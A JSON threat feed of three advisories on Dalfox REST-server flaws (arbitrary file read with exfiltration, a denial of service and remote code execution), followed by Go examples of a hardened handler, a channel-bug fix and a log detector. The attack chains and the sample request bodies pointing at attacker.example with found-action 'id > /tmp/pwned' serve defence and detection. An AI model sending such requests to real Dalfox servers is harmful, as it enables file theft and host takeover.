{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/dalfox/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["dalfox/v2"],"_cs_severities":["high"],"_cs_tags":["unauthenticated-access","file-read","ghsa"],"_cs_type":"advisory","_cs_vendors":["GitHub"],"content_html":"\u003cp\u003eDalfox, when run in REST API server mode (\u003ccode\u003edalfox server\u003c/code\u003e), is vulnerable to an unauthenticated arbitrary file read. The \u003ccode\u003ecustom-payload-file\u003c/code\u003e field of \u003ccode\u003emodel.Options\u003c/code\u003e is deserialized straight from the JSON request body and later used as the path of a file to open on the server. An attacker sends a POST request to the \u003ccode\u003e/scan\u003c/code\u003e endpoint with \u003ccode\u003ecustom-payload-file\u003c/code\u003e pointing at a file on the Dalfox host; Dalfox reads that file line by line and uses each line as a payload in outbound HTTP requests to the target URL, which the attacker also controls. The issue is reachable because the server does not require an API key by default and passes request-supplied options to the scanner without filtering file-path fields. An unauthenticated network attacker can therefore exfiltrate the contents of any file readable by the dalfox process. The affected version is dalfox/v2 \u0026lt;= 2.12.0.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker sends a POST request to the \u003ccode\u003e/scan\u003c/code\u003e endpoint of the Dalfox REST API server (listening on \u003ccode\u003e0.0.0.0:6664\u003c/code\u003e by default).\u003c/li\u003e\n\u003cli\u003eThe JSON body sets \u003ccode\u003eurl\u003c/code\u003e to an attacker-controlled server and, under \u003ccode\u003eoptions\u003c/code\u003e, sets \u003ccode\u003ecustom-payload-file\u003c/code\u003e, \u003ccode\u003eskip-discovery\u003c/code\u003e, and \u003ccode\u003eparam\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecustom-payload-file\u003c/code\u003e holds the path of the file the attacker wants to read (e.g., \u003ccode\u003e/etc/hostname\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eskip-discovery\u003c/code\u003e is set to \u003ccode\u003etrue\u003c/code\u003e and \u003ccode\u003eparam\u003c/code\u003e to \u003ccode\u003e[\u0026quot;q\u0026quot;]\u003c/code\u003e, so Dalfox skips parameter discovery and injects its payloads directly into the named parameter \u003ccode\u003eq\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDalfox reads the specified file line by line using \u003ccode\u003evoltFile.ReadLinesOrLiteral\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEach line of the file is embedded as the value of the \u003ccode\u003eq\u003c/code\u003e query parameter in a GET request to the attacker-controlled URL.\u003c/li\u003e\n\u003cli\u003eDalfox sends the GET request to the attacker\u0026rsquo;s server, exfiltrating one line of the file per request.\u003c/li\u003e\n\u003cli\u003eThe attacker reassembles the file from the \u003ccode\u003eq\u003c/code\u003e values of the incoming requests.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows an attacker to read arbitrary files on the Dalfox host that the dalfox process can access. This includes sensitive data such as SSH private keys, TLS certificates and keys, \u003ccode\u003e.env\u003c/code\u003e files containing credentials, cloud credential files, and system configuration files. Combined with the \u003ccode\u003efound-action\u003c/code\u003e RCE in the same server mode, the attacker could gain full control of the server.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the preferred remediation: apply a denylist of fields that must never be accepted from the REST API, as suggested in the source, so that \u003ccode\u003eCustomPayloadFile\u003c/code\u003e and the other file-path and execution-control options are dropped from API-sourced requests before a scan starts.\u003c/li\u003e\n\u003cli\u003eRequire the \u003ccode\u003e--api-key\u003c/code\u003e flag at server startup, as suggested in the source, so that every API request must authenticate, and bind the listener to a loopback or internal address rather than the default \u003ccode\u003e0.0.0.0\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Dalfox Unauthenticated File Read via API\u003c/code\u003e to flag HTTP POST requests to the \u003ccode\u003e/scan\u003c/code\u003e endpoint whose body carries a \u003ccode\u003ecustom-payload-file\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eMonitor outbound HTTP requests from the Dalfox host: because every line leaves as a separate request to the attacker\u0026rsquo;s URL, a scan aimed at a target that is not an approved asset is a second indicator of this attack.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-12T15:11:08Z","date_published":"2026-05-12T15:11:08Z","id":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-file-read/","summary":"Dalfox server mode is vulnerable to an unauthenticated arbitrary file read with out-of-band exfiltration via the `custom-payload-file` parameter, allowing attackers to read any file the dalfox process can open on the host.","title":"Dalfox Server Mode Unauthenticated Arbitrary File 
Read","url":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-file-read/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["dalfox"],"_cs_severities":["medium"],"_cs_tags":["dos","vulnerability","dalfox"],"_cs_type":"advisory","_cs_vendors":["github.com"],"content_html":"\u003cp\u003eDalfox, a security tool, is susceptible to an unauthenticated remote denial-of-service vulnerability (CVE-2026-45090) in its \u003ccode\u003eParameterAnalysis\u003c/code\u003e function. \u003ccode\u003eParameterAnalysis\u003c/code\u003e uses a two-stage worker design, and the second stage reuses the \u003ccode\u003eresults\u003c/code\u003e channel that was already closed at the end of the first stage. When a scanned parameter is reflected during the second stage and \u003ccode\u003eprocessParams\u003c/code\u003e writes its result to that closed channel, the Go runtime panics with \u003ccode\u003esend on closed channel\u003c/code\u003e; nothing recovers the panic, so in server mode the entire Dalfox process terminates. Any unauthenticated caller with network access to the Dalfox REST API can trigger this remotely: the default configuration has no API key, and the second stage runs whenever \u003ccode\u003eoptions.Data != \u0026quot;\u0026quot;\u003c/code\u003e (i.e., the attacker supplies the \u003ccode\u003edata\u003c/code\u003e field) and the target reflects at least one parameter. This issue affects Dalfox versions 2.12.0 and earlier.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker sends a POST request to the \u003ccode\u003e/scan\u003c/code\u003e endpoint of the Dalfox REST API server.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eurl\u003c/code\u003e field points at an HTTP server, reachable from the Dalfox host, that reflects a query parameter (the original proof of concept uses \u003ccode\u003ehttp://127.0.0.1:18083/?q=test\u003c/code\u003e); the attacker can host it, but any reachable reflecting page works.\u003c/li\u003e\n\u003cli\u003eThe JSON payload\u0026rsquo;s \u003ccode\u003eoptions\u003c/code\u003e contain \u003ccode\u003e\u0026quot;data\u0026quot;: \u0026quot;q=test\u0026quot;\u003c/code\u003e, \u003ccode\u003e\u0026quot;mining-dict\u0026quot;: true\u003c/code\u003e, and \u003ccode\u003e\u0026quot;use-headless\u0026quot;: false\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe non-empty \u003ccode\u003eoptions.Data\u003c/code\u003e value activates the second worker stage in \u003ccode\u003eParameterAnalysis\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emining-dict: true\u003c/code\u003e populates the POST-body parameter map (\u003ccode\u003edp\u003c/code\u003e) with numerous entries from the GF-XSS wordlist, giving the second stage many parameters to test.\u003c/li\u003e\n\u003cli\u003eThe target server reflects the \u003ccode\u003eq\u003c/code\u003e parameter, so the \u003ccode\u003evrs\u003c/code\u003e variable evaluates to true inside \u003ccode\u003eprocessParams\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eprocessParams\u003c/code\u003e attempts to send a \u003ccode\u003eparamResult\u003c/code\u003e on the closed \u003ccode\u003eresults\u003c/code\u003e channel: \u003ccode\u003eresults \u0026lt;- paramResult\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe send panics because the \u003ccode\u003eresults\u003c/code\u003e channel was already closed after the first stage of \u003ccode\u003eParameterAnalysis\u003c/code\u003e, and the Dalfox server process crashes.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful exploit crashes the Dalfox server process with a single unauthenticated POST request. Any in-flight scan results are lost and the server must be restarted by hand. If Dalfox is managed by an automated process manager (such as systemd or Docker with \u003ccode\u003e--restart=always\u003c/code\u003e), the attacker can simply resend the request after each restart, turning the crash into a denial-of-service loop. The attack requires network access to port 6664 (the default Dalfox API port) and a reflecting HTTP server reachable from the Dalfox instance.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the advisory\u0026rsquo;s suggested fix (Option 1): allocate a fresh \u003ccode\u003eresults\u003c/code\u003e channel for the second stage inside \u003ccode\u003eParameterAnalysis\u003c/code\u003e, so that no goroutine ever writes to a channel the first stage has closed.\u003c/li\u003e\n\u003cli\u003eAs a temporary measure, apply Option 3 and add a \u003ccode\u003erecover\u003c/code\u003e in the \u003ccode\u003eprocessParams\u003c/code\u003e goroutines so the panic no longer kills the process while the proper fix is deployed. This keeps the server up but silently discards the second-stage result whose send failed, so it is a stopgap, not a fix.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Dalfox DoS Attack via /scan Endpoint\u0026rdquo; to flag POST requests to the \u003ccode\u003e/scan\u003c/code\u003e endpoint whose \u003ccode\u003eoptions\u003c/code\u003e carry a non-empty \u003ccode\u003edata\u003c/code\u003e field, the condition that activates the vulnerable second stage (the proof of concept additionally sets \u003ccode\u003emining-dict: true\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eMonitor Dalfox server logs for \u0026ldquo;panic: send on closed channel\u0026rdquo; messages originating from \u003ccode\u003epkg/scanning/parameterAnalysis.go:299\u003c/code\u003e, which indicate a successful exploit of CVE-2026-45090. The Go runtime writes the panic and goroutine dump to stderr, so the process manager must capture stderr for this search to find anything.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-12T15:10:28Z","date_published":"2026-05-12T15:10:28Z","id":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-dos/","summary":"Dalfox is exposed to an unauthenticated remote denial of service (CVE-2026-45090): a write to a closed channel in the `ParameterAnalysis` function, triggered by a crafted POST request, crashes the Dalfox server process.","title":"Dalfox Unauthenticated Remote DoS via Closed-Channel Write in ParameterAnalysis","url":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-dos/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["dalfox/v2 (\u003c= 2.12.0)"],"_cs_severities":["critical"],"_cs_tags":["rce","dalfox","cve-2026-45087"],"_cs_type":"advisory","_cs_vendors":["Hahwul"],"content_html":"\u003cp\u003eDalfox, a security auditing tool, is vulnerable to unauthenticated remote code execution (CVE-2026-45087) when running in REST API server mode (\u003ccode\u003edalfox server\u003c/code\u003e) with default settings. The server binds to \u003ccode\u003e0.0.0.0:6664\u003c/code\u003e and, unless started with \u003ccode\u003e--api-key\u003c/code\u003e, requires no authentication. The server deserializes \u003ccode\u003emodel.Options\u003c/code\u003e, including \u003ccode\u003eFoundAction\u003c/code\u003e and \u003ccode\u003eFoundActionShell\u003c/code\u003e, directly from attacker-supplied JSON in \u003ccode\u003ePOST /scan\u003c/code\u003e. Because \u003ccode\u003edalfox.Initialize\u003c/code\u003e propagates these fields into the final scan options without sanitization, any unauthenticated attacker can execute arbitrary shell commands on the host OS whenever the scan produces a finding. 
This vulnerability affects dalfox versions 2.12.0 and earlier.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe operator starts a \u003ccode\u003edalfox server\u003c/code\u003e instance in REST API mode without specifying an API key, leaving it open to unauthenticated access.\u003c/li\u003e\n\u003cli\u003eThe attacker sets up a web server that reflects input, ensuring any scan against it will produce a finding.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a \u003ccode\u003ePOST\u003c/code\u003e request to the \u003ccode\u003e/scan\u003c/code\u003e endpoint of the dalfox server.\u003c/li\u003e\n\u003cli\u003eThe JSON payload names the reflecting web server as the \u003ccode\u003eurl\u003c/code\u003e and sets \u003ccode\u003eoptions\u003c/code\u003e with attacker-chosen values for \u003ccode\u003efound-action\u003c/code\u003e (the command to run) and \u003ccode\u003efound-action-shell\u003c/code\u003e (the shell to run it with).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epostScanHandler\u003c/code\u003e deserializes the JSON payload into a \u003ccode\u003eReq\u003c/code\u003e struct, including the \u003ccode\u003eoptions\u003c/code\u003e field that carries the malicious \u003ccode\u003eFoundAction\u003c/code\u003e and \u003ccode\u003eFoundActionShell\u003c/code\u003e values.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eScanFromAPI\u003c/code\u003e is called and passes the attacker-controlled options to \u003ccode\u003edalfox.Initialize\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edalfox.Initialize\u003c/code\u003e copies the attacker-supplied \u003ccode\u003eFoundAction\u003c/code\u003e and \u003ccode\u003eFoundActionShell\u003c/code\u003e values into the scan options without sanitization.\u003c/li\u003e\n\u003cli\u003eWhen the scan produces a finding, the \u003ccode\u003efoundAction\u003c/code\u003e function runs the attacker-supplied command through \u003ccode\u003eexec.Command\u003c/code\u003e, achieving remote code execution on the dalfox host.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation results in unauthenticated remote code execution on the host running \u003ccode\u003edalfox server\u003c/code\u003e, with the privileges of the dalfox process. The attacker gains read access to every secret, configuration file, and credential that process can reach, and can write files to establish persistence, install backdoors, and exfiltrate data. The default \u003ccode\u003e0.0.0.0\u003c/code\u003e bind address exposes the server on all network interfaces, including public-facing ones in misconfigured environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRequire API key:\u003c/strong\u003e Enforce \u003ccode\u003e--api-key\u003c/code\u003e in REST server mode by refusing to start when no API key is provided, as described in the remediation suggestion within the advisory.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eStrip \u003ccode\u003eFoundAction\u003c/code\u003e / \u003ccode\u003eFoundActionShell\u003c/code\u003e:\u003c/strong\u003e Sanitize API-sourced requests by clearing \u003ccode\u003eFoundAction\u003c/code\u003e and \u003ccode\u003eFoundActionShell\u003c/code\u003e in \u003ccode\u003epostScanHandler\u003c/code\u003e so untrusted callers cannot set execution-control options. An API key alone does not close this path: anyone holding the key can still run commands on the host, so both measures are needed.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeploy the Sigma rules:\u003c/strong\u003e Deploy the Sigma rules provided with the brief to your SIEM and tune them for your environment to detect exploitation attempts.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUpgrade Dalfox:\u003c/strong\u003e Upgrade to a patched version of Dalfox that addresses CVE-2026-45087.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-12T15:10:12Z","date_published":"2026-05-12T15:10:12Z","id":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-rce/","summary":"Dalfox in REST API server mode is vulnerable to unauthenticated remote code execution (CVE-2026-45087) because the server binds to 0.0.0.0:6664 by default without requiring an API key and deserializes attacker-supplied JSON in `POST /scan` without stripping the `FoundAction` and `FoundActionShell` fields, allowing arbitrary command execution.","title":"Dalfox Server Mode Vulnerable to Unauthenticated Remote Code Execution via `found-action`","url":"https://feed.craftedsignal.io/briefs/2026-05-dalfox-rce/"}],"language":"en","title":"CraftedSignal Threat Feed — Dalfox","version":"https://jsonfeed.org/version/1.1"}
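The file-read and found-action briefs in this feed end in the same pair of fixes: require `--api-key`, and never let an API caller set file-path or execution-control options. The Go program below is an added example written for this page, not Dalfox's own code. It shows a hardened `POST /scan` handler that answers 401 without a valid key and strips the three option names the briefs identify (`custom-payload-file`, `found-action`, `found-action-shell`) before the request reaches the scanner. The `scanRequest` type, the `X-API-KEY` header name, the `example-key` value, the echo "scanner" and the attacker URL and command in the sample body are assumptions of the example; a real patch would also audit `model.Options` for every other field that names a local path or a command.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"log"
	"net/http"
	"net/http/httptest"
	"sort"
	"strings"
)

// scanRequest stands in for the JSON body accepted by POST /scan in the briefs:
// a target URL plus a free-form options object (assumed shape, not Dalfox's type).
type scanRequest struct {
	URL     string                 `json:"url"`
	Options map[string]interface{} `json:"options"`
}

// deniedOptionKeys are option names a REST caller must never control. These are
// the three named in the briefs; audit model.Options and extend the list.
var deniedOptionKeys = map[string]string{
	"custom-payload-file": "opens an arbitrary local file (file-read brief)",
	"found-action":        "command run on every finding (CVE-2026-45087)",
	"found-action-shell":  "shell used to run found-action (CVE-2026-45087)",
}

// sanitizeAPIOptions returns a copy of opts without the denied keys, plus the
// sorted list of keys that were removed so the caller can log the attempt.
func sanitizeAPIOptions(opts map[string]interface{}) (map[string]interface{}, []string) {
	clean := make(map[string]interface{}, len(opts))
	dropped := []string{}
	for k, v := range opts {
		if _, denied := deniedOptionKeys[k]; denied {
			dropped = append(dropped, k)
			continue
		}
		clean[k] = v
	}
	sort.Strings(dropped)
	return clean, dropped
}

// authorized implements the "require --api-key" recommendation. The X-API-KEY
// header name is an assumption. An empty configured key authorizes nobody; a
// real server should refuse to start in that state.
func authorized(r *http.Request, apiKey string) bool {
	return apiKey != "" && r.Header.Get("X-API-KEY") == apiKey
}

// newScanHandler rejects unauthenticated callers and strips execution-control
// and file-path options before anything reaches the scanner, which here only
// echoes the cleaned request back.
func newScanHandler(apiKey string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method != http.MethodPost {
			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
			return
		}
		if !authorized(r, apiKey) {
			http.Error(w, "missing or invalid API key", http.StatusUnauthorized)
			return
		}
		var req scanRequest
		if err := json.NewDecoder(io.LimitReader(r.Body, 1<<20)).Decode(&req); err != nil {
			http.Error(w, "bad request", http.StatusBadRequest)
			return
		}
		clean, dropped := sanitizeAPIOptions(req.Options)
		if len(dropped) > 0 {
			log.Printf("scan request for %q dropped denied options: %s", req.URL, strings.Join(dropped, ","))
		}
		req.Options = clean
		w.Header().Set("Content-Type", "application/json")
		_ = json.NewEncoder(w).Encode(req)
	})
}

// postScan pushes one request through the handler in-process and returns the
// status code and trimmed response body.
func postScan(h http.Handler, apiKey, body string) (int, string) {
	req := httptest.NewRequest(http.MethodPost, "/scan", strings.NewReader(body))
	if apiKey != "" {
		req.Header.Set("X-API-KEY", apiKey)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code, strings.TrimSpace(rec.Body.String())
}

// maliciousBody is a constructed request combining the file-read and
// found-action option names from the briefs; URL and command are placeholders.
const maliciousBody = `{"url":"http://attacker.example/?q=test","options":{"custom-payload-file":"/etc/hostname","skip-discovery":true,"param":["q"],"found-action":"id > /tmp/pwned","found-action-shell":"sh"}}`

func main() {
	h := newScanHandler("example-key")
	code, body := postScan(h, "", maliciousBody)
	fmt.Println("no key:  ", code, body)
	code, body = postScan(h, "example-key", maliciousBody)
	fmt.Println("with key:", code, body)
}
```

Running it shows the unauthenticated request stopped at 401 and the authenticated one passed through with only `param` and `skip-discovery` left in `options`. Stripping is done in the handler rather than in the scanner so that the denylist applies to every API path, and the dropped keys are logged because a request carrying `found-action` from the network is itself an indicator worth keeping.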
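The DoS brief describes a Go concurrency bug: a second worker stage sends on a channel the first stage has already closed. The program below is an added example, not Dalfox's `ParameterAnalysis`. `analyze` runs two stages over constructed parameter lists; its `fresh` flag switches between reusing stage 1's closed channel (the bug) and allocating a new one for stage 2 (the brief's Option 1). Every panic is recovered and recorded, which is the brief's Option 3, so the demo can report what was lost instead of dying; the real server has no such recover and exits on the first send. The parameter names and the reflection oracle are constructed.

```go
package main

import (
	"fmt"
	"sort"
	"sync"
)

// paramResult is the per-parameter outcome a stage reports back.
type paramResult struct {
	Name      string
	Reflected bool
}

// analysisReport replaces the crash: the results actually delivered and every
// panic message that was recovered along the way.
type analysisReport struct {
	Results []paramResult
	Panics  []string
}

// fanOut stands in for Dalfox's processParams workers: one goroutine per
// parameter, sending reflected ones (vrs == true) to results. The deferred
// recover is the Option 3 stopgap; without it the first "send on closed
// channel" panic would take the whole process down.
func fanOut(params []string, reflects func(string) bool, results chan<- paramResult, record func(string)) {
	var wg sync.WaitGroup
	for _, p := range params {
		wg.Add(1)
		go func(p string) {
			defer wg.Done()
			defer func() {
				if r := recover(); r != nil {
					record(fmt.Sprint(r))
				}
			}()
			if reflects(p) {
				results <- paramResult{Name: p, Reflected: true}
			}
		}(p)
	}
	wg.Wait()
}

// collect drains results until the channel is closed, then delivers the slice.
func collect(results <-chan paramResult) <-chan []paramResult {
	done := make(chan []paramResult, 1)
	go func() {
		var out []paramResult
		for r := range results {
			out = append(out, r)
		}
		done <- out
	}()
	return done
}

// analyze models ParameterAnalysis: stage 1 tests query parameters; stage 2
// tests POST-body parameters and runs only when body data was supplied
// (options.Data != "" in Dalfox). fresh == false reuses the channel stage 1
// already closed (the CVE-2026-45090 bug); fresh == true gives stage 2 its own.
func analyze(queryParams, bodyParams []string, reflects func(string) bool, fresh bool) analysisReport {
	var rep analysisReport
	var mu sync.Mutex
	record := func(msg string) {
		mu.Lock()
		defer mu.Unlock()
		rep.Panics = append(rep.Panics, msg)
	}

	// Stage 1 creates, fills and closes its own channel: correct on its own.
	results := make(chan paramResult)
	done := collect(results)
	fanOut(queryParams, reflects, results, record)
	close(results)
	rep.Results = append(rep.Results, <-done...)

	if len(bodyParams) == 0 {
		return rep
	}
	if fresh {
		results = make(chan paramResult) // Option 1: a channel stage 2 owns
	}
	done = collect(results)                        // on a closed channel this drains nothing and finishes at once
	fanOut(bodyParams, reflects, results, record) // buggy path: each reflected parameter panics on send
	if fresh {
		close(results) // only the owner of a live channel may close it
	}
	rep.Results = append(rep.Results, <-done...)
	return rep
}

// reflectedNames returns the delivered parameter names sorted, so goroutine
// scheduling order does not affect comparisons.
func reflectedNames(rep analysisReport) []string {
	names := make([]string, 0, len(rep.Results))
	for _, r := range rep.Results {
		names = append(names, r.Name)
	}
	sort.Strings(names)
	return names
}

func main() {
	// Constructed target: it reflects the "q" query and "cmd" body parameters.
	reflects := func(p string) bool { return p == "q" || p == "cmd" }
	query, body := []string{"q", "page"}, []string{"cmd", "user"}
	buggy := analyze(query, body, reflects, false)
	fmt.Println("shared channel: delivered", reflectedNames(buggy), "panics", buggy.Panics)
	fixed := analyze(query, body, reflects, true)
	fmt.Println("fresh channel:  delivered", reflectedNames(fixed), "panics", fixed.Panics)
}
```

With the shared channel the run delivers only `q` and records one `send on closed channel` panic: the reflected body parameter `cmd` is exactly the result that disappears when Option 3 alone is deployed. With the fresh channel both parameters are delivered and nothing panics. The rule the fix encodes is that a channel has one owner, and the stage that created it is the only one allowed to close it.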
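All three briefs recommend Sigma rules keyed on the body of `POST /scan`. The program below is an added example that applies the same conditions in Go to constructed proxy-style log lines, so the logic can be checked before a rule is written for a SIEM; it is not the CraftedSignal rule set. The log format (one JSON object per line with `method`, `path` and the raw `body`), the rule names, the hosts and the command in the sample are assumptions. It flags `custom-payload-file` (file read), `found-action` or `found-action-shell` (RCE) and a non-empty `data` option (the second-stage DoS trigger).

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"io"
	"strings"
)

// requestLog is one constructed log line: method, path and raw body of a
// request as a reverse proxy in front of the Dalfox API might record it
// (assumed format, not a Dalfox log).
type requestLog struct {
	Method string `json:"method"`
	Path   string `json:"path"`
	Body   string `json:"body"`
}

// scanBody mirrors the POST /scan fields the three briefs depend on.
type scanBody struct {
	URL     string                 `json:"url"`
	Options map[string]interface{} `json:"options"`
}

// alert pairs a log line number with the scan target and the detections that fired.
type alert struct {
	Line  int
	URL   string
	Rules []string
}

func hasAny(m map[string]interface{}, keys ...string) bool {
	for _, k := range keys {
		if _, ok := m[k]; ok {
			return true
		}
	}
	return false
}

// classify evaluates one log line. Only POST /scan is in scope, and a body that
// does not parse never reaches the vulnerable code, so it is not a hit.
func classify(line string) (rules []string, target string, err error) {
	var rec requestLog
	if e := json.Unmarshal([]byte(line), &rec); e != nil {
		return nil, "", e
	}
	if rec.Method != "POST" || strings.TrimRight(rec.Path, "/") != "/scan" {
		return nil, "", nil
	}
	var body scanBody
	if json.Unmarshal([]byte(rec.Body), &body) != nil {
		return nil, "", nil
	}
	if _, ok := body.Options["custom-payload-file"]; ok {
		rules = append(rules, "dalfox_file_read")
	}
	if hasAny(body.Options, "found-action", "found-action-shell") {
		rules = append(rules, "dalfox_found_action_rce")
	}
	if data, ok := body.Options["data"].(string); ok && data != "" {
		rules = append(rules, "dalfox_dos_second_stage")
	}
	return rules, body.URL, nil
}

// detect runs classify over every line and keeps the ones that fired.
func detect(r io.Reader) ([]alert, error) {
	var alerts []alert
	sc := bufio.NewScanner(r)
	for n := 1; sc.Scan(); n++ {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		rules, target, err := classify(line)
		if err != nil {
			return nil, fmt.Errorf("line %d: %v", n, err)
		}
		if len(rules) > 0 {
			alerts = append(alerts, alert{Line: n, URL: target, Rules: rules})
		}
	}
	return alerts, sc.Err()
}

// sampleLog is constructed: a benign scan, the three attack shapes from the
// briefs, and an unrelated request. Hosts, paths and the command are placeholders.
const sampleLog = `{"method":"POST","path":"/scan","body":"{\"url\":\"https://app.internal/search?q=x\",\"options\":{\"param\":[\"q\"]}}"}
{"method":"POST","path":"/scan","body":"{\"url\":\"http://attacker.example/?q=test\",\"options\":{\"custom-payload-file\":\"/etc/hostname\",\"skip-discovery\":true,\"param\":[\"q\"]}}"}
{"method":"POST","path":"/scan","body":"{\"url\":\"http://attacker.example/?q=test\",\"options\":{\"found-action\":\"id > /tmp/pwned\",\"found-action-shell\":\"sh\"}}"}
{"method":"POST","path":"/scan","body":"{\"url\":\"http://127.0.0.1:18083/?q=test\",\"options\":{\"data\":\"q=test\",\"mining-dict\":true,\"use-headless\":false}}"}
{"method":"GET","path":"/health","body":""}
`

func main() {
	alerts, err := detect(strings.NewReader(sampleLog))
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("line %d target=%s rules=%s\n", a.Line, a.URL, strings.Join(a.Rules, ","))
	}
}
```

The benign first line and the `GET /health` line produce nothing; lines 2, 3 and 4 each fire exactly one rule. The target URL is carried into the alert on purpose: for the file-read and found-action cases it names the attacker's collection server, which is the next thing an analyst will want to block.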